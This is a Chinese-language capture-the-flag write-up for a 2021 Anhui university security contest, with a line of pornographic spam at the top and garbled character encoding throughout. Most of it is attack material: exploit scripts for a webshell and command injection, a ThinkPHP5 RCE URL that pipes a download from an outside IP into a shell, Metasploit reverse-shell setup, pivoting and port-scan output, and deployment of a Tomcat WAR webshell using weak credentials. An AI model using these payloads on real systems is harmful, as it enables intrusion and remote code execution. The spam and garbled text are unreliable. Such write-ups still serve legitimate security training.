奇米影视狠狠色,国产一级特黄a高潮片,欧美一级大胆视频,国产淫荡av,免费无码一区二区三区,真实夫妇交换性经过,免费黄片网,www.71.com色婬免费

首屆安徽"追日杯"大學(xué)生網(wǎng)絡(luò)安全挑戰(zhàn)賽?WRITEUP

本文來自“白帽子社區(qū)知識(shí)星球”

作者：WHT戰(zhàn)隊(duì)

白帽子社區(qū)知識(shí)星球

加入星球，共同進(jìn)步

checkin

一打開題目復(fù)制答案，提交即可。

flag值：flag{welcome_to_zrb@2021}

伊澤瑞爾的php

Exp：

```python#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time    : 2021/12/5 10:59# @Author  : upload# @File    : ada.py# @Software: PyCharmimport requestsimport zlibimport reimport base64
def x(t,k):  return ''.join([chr(ord(x)^ord(y)) for x,y in zip(t,k*(len(t)/len(k)+1))])
session = requests.Session()# @eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));cmd = 'system("cat /flag");'cmd = zlib.compress(cmd)cmd = x(cmd,"25ed1bcb")cmd = base64.b64encode(cmd)
rawBody = "423b0b7200f4{cmd}85fc5ff71c8e".format(cmd=cmd)print(rawBody)response = session.post("http://ctf.zrb.edisec.net:19859//index.php", data=rawBody)
print("Response body: %s" % response.content)res = re.findall(r'niGqOXD4rBhBWZ7t423b0b7200f4(.+)85fc5ff71c8e',response.content)[0]
# $r=@base64_encode(@x(@gzcompress($o),$k));res = base64.b64decode(res)res = x(res,"25ed1bcb")res = zlib.decompress(res)print(res)```

gotofly

```python#!/usr/bin/env python# -*- coding: utf-8 -*-# @Time    : 2021/12/5 9:56# @Author  : upload# @File    : exp.py# @Software: PyCharm

import requestssession = requests.session()import requests
burp0_url = "http://ctf.zrb.edisec.net:30989/flag"burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://ctf.zrb.edisec.net:34231/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
ip =  "http://ctf.zrb.edisec.net:34231"r1 = session.get(url=burp0_url,allow_redirects=False)print(r1.headers.get('Location'))r2 = session.get(r1.headers.get('Location'),allow_redirects=False)print(r2.headers.get('Location'))url = ip + r2.headers.get('Location')for i in range(0,1000):    r3 = session.get(url,allow_redirects=False)    print(r3.text)    url = ip + r3.headers.get('Location')    print(url)

# while True:#     if r1.status_code==301 or r1.status_code == 302:#         r1 = result.get(burp0_url,burp0_headers)

2_let_me_rce

經(jīng)測(cè)試：

①繞過空格 %09

②列目錄命令 du -a . 或chgrp -v -R

③ 查看文件 sed p

查看文件：

?cmd=sed%09p%09f1ag_1s_here%09```
```http://ctf.zrb.edisec.net:57807/?cmd='.`sed%09p%09/cccccreal_flag_here_ccccfffffffllllllllaggggg%09`.'```

?綜合滲透-FLAG1

thinkphp5 rce反彈shell

http://82.156.76.152:8077/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20116.62.104.172|sh

上線msf

```use exploit/multi/script/web_deliveryshow targetsset target 6set payload linux/x64/meterpreter/reverse_tcpset lhost 10.18.228.36run```

查看網(wǎng)段

添加路由

```run autoroute -s 10.134.110.0/24```

掃描存活主機(jī)

```msf6 auxiliary(scanner/portscan/tcp) > run[*] 1.14.65.168 - Meterpreter session 6 closed.  Reason: Died
[*] Sending stage (3008420 bytes) to 1.14.65.168[+] 10.134.110.26:        - 10.134.110.26:8080 - TCP OPEN[*] 10.134.110.0/24:      - Scanned  26 of 256 hosts (10% complete)[+] 10.134.110.34:        - 10.134.110.34:3306 - TCP OPEN[+] 10.134.110.52:        - 10.134.110.52:80 - TCP OPEN[+] 10.134.110.52:        - 10.134.110.52:6379 - TCP OPEN[*] 10.134.110.0/24:      - Scanned  52 of 256 hosts (20% complete)[*] 10.134.110.0/24:      - Scanned  78 of 256 hosts (30% complete)[*] 10.134.110.0/24:      - Scanned 103 of 256 hosts (40% complete)[*] Meterpreter session 8 opened (172.16.174.127:4444 -> 1.14.65.168:41826) at 2021-12-05 14:06:12 +0800[*] 10.134.110.0/24:      - Scanned 128 of 256 hosts (50% complete)[*] 10.134.110.0/24:      - Scanned 155 of 256 hosts (60% complete)[*] 10.134.110.0/24:      - Scanned 180 of 256 hosts (70% complete)[*] 10.134.110.0/24:      - Scanned 205 of 256 hosts (80% complete)[*] 10.134.110.0/24:      - Scanned 231 of 256 hosts (90% complete)[*] 10.134.110.0/24:      - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed
```

綜合滲透-FLAG3

發(fā)現(xiàn)存活主機(jī)10.134.110.26開放了8080端口

10.134.110.26:8080

使用msf將8080轉(zhuǎn)發(fā)到8082端口

```portfwd add -l 8082 -p 8080 -r 10.134.110.26```

為一個(gè)tomcat服務(wù)

```/manager/html```

弱口令tomcat/tomcat，部署war包，拿到flag3

116.62.104.172:8082/cmd/cmd.jsp?cmd=cat+%2Fflag3

問卷

如果覺得本文不錯(cuò)的話，歡迎加入知識(shí)星球，星球內(nèi)部設(shè)立了多個(gè)技術(shù)版塊，目前涵蓋“WEB安全”、“內(nèi)網(wǎng)滲透”、“CTF技術(shù)區(qū)”、“漏洞分析”、“工具分享”五大類，還可以與嘉賓大佬們接觸，在線答疑、互相探討。

▼掃碼關(guān)注白帽子社區(qū)公眾號(hào)&加入知識(shí)星球▼

首屆安徽"追日杯"大學(xué)生網(wǎng)絡(luò)安全挑戰(zhàn)賽WRITEUP